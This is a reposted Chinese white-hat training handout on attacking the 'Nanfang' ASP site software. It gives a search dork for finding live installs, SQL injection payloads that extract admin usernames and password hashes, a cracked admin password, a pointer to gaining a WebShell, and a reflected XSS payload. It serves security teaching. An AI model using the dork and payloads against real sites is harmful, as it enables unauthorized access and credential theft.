前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >米斯特白帽培训讲义 实战篇 南方 0day

米斯特白帽培训讲义 实战篇 南方 0day

作者头像
ApacheCN_飞龙
发布2019-02-15 10:29:19
5690
发布2019-02-15 10:29:19
举报
文章被收录于专栏:信数据得永生

米斯特白帽培训讲义 实战篇 南方 0day

讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0

搜索

关键词:inurl:"HomeMarket.asp"

下载与部署

http://www.jb51.net/article/5336.htm

SQL 注入

我们打算检测其中的 SQL 注入漏洞,由于 ASP 代码基本没有什么好的过滤,一般一查一个准。为了搜索 SQL 注入漏洞,我们可以使用sqlconn这类名称、或者execute这类函数来定位到数据库查询低吗位置。

比如在NewsType.asp的 14 ~ 32 行,我们发现了:

代码语言:javascript
复制
<%
' ...
BigClass=request("BigClass")
SmallClass=request("SmallClass")
' ...
%>
<%
if BigClass<>"" and SmallClass<>"" then
sql="select  * from News where BigClassName='"& BigClass &"' and  SmallClassName='"& SmallClass &"' order by AddDate desc"
set rs=conn.execute(sql)
do while not rs.eof 
%>

我们看到这是文本型的参数,也就是说我们注入的时候要想办法闭合单引号。而且它用的是 Access 数据库,我们没办法像 MySQL 和 SQLServer 那样使用--来注释。

我们照旧为SmallClass输入' and '1'='1,构造的 URL 为NewsType.asp?SmallClass=%27%20and%20%271%27=%271,发现正常。

输入' and '1'='2,构造的 URL 为NewsType.asp?SmallClass=%27%20and%20%271%27=%272,发现错误。

接下来我们查看源码目录下的Databases/0791idc.mdb,知道了News表一共有十个字段。

之后输入' and 1=2 union select 1,2,3,4,5,6,7,8,9,0 from admin where '1'='1,发现显示 2 和 9:

之后就很简单了,我们先看看admin表里面的用户名和密码都叫做啥。我们把 2 替换为username,9 替换为password

然后把f3a976c77dc7264c送到 pmd5 解密,结果为060618

之后可以从/admin访问后台,登录并继续拿 WebShell。

XSS

我们点击网站右上角的“联系我们”,可以发现这个页面的 URL 中出现了这四个字,页面中也出现了这四个字。

然后我们把 URL 中的Title参数改成1

这就提示我们这里面可能会出现 XSS,我们改成<script>alert(1)</script>

我们看到源代码中出现了这个东西。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2016年12月26日,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 米斯特白帽培训讲义 实战篇 南方 0day
    • 搜索
      • 下载与部署
        • SQL 注入
          • XSS
          相关产品与服务
          数据库
          云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档